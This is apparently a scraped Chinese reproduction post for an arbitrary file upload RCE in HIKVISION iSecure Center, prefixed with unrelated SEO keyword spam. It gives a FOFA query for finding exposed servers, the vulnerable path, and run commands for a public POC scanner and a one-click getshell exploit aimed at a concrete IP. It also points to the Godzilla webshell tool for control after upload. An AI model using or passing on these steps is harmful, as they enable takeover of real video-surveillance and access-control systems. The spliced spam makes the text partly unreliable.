onethink做移动网站,企业网站开发汇报,wordpress音乐分享,合肥网站推广培训系统介绍 HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台#xff0c;通过接入视频监控、一卡通、停车场、报警检测等系统的设备#xff0c;获取边缘节点数据#xff0c;实现安防信息化集成与联动#xff0c;公众号#xff1a;web安全工具库…系统介绍 HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台通过接入视频监控、一卡通、停车场、报警检测等系统的设备获取边缘节点数据实现安防信息化集成与联动公众号web安全工具库以电子地图为载体融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计采用业务组件化技术满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务对各系统资源进行了整合和集中管理实现统一部署、统一配置、统一管理和统一调度。
影响范围
iSecure Center(V1.0.0 - V1.7.0 )
复现环境
FOFAapp“HIKVISION-iSecure-Center”
漏洞复现 ip:port/center/api/files;.js 若出现此页面则可能存在漏洞 工具快速复现
poc采用无害化扫描检测无文件残留可批量检测exp只做单个url攻击一键shell GitHub - xwna/HIKVISION_iSecure_Center-RCE: HIKVISION iSecure Center RCE 海康威视综合安防管理平台任意文件上传 POCEXP一键getshell POC python3 iSecure-Center-RCE_POC.py -f URL.txt EXP python3 iSecure-Center-RCE_EXP.py -u https://182.19.10.99 通过哥斯拉工具连接
下载 GitHub - BeichenDream/Godzilla: 哥斯拉 还可以通过手工修改数据包方式上传。
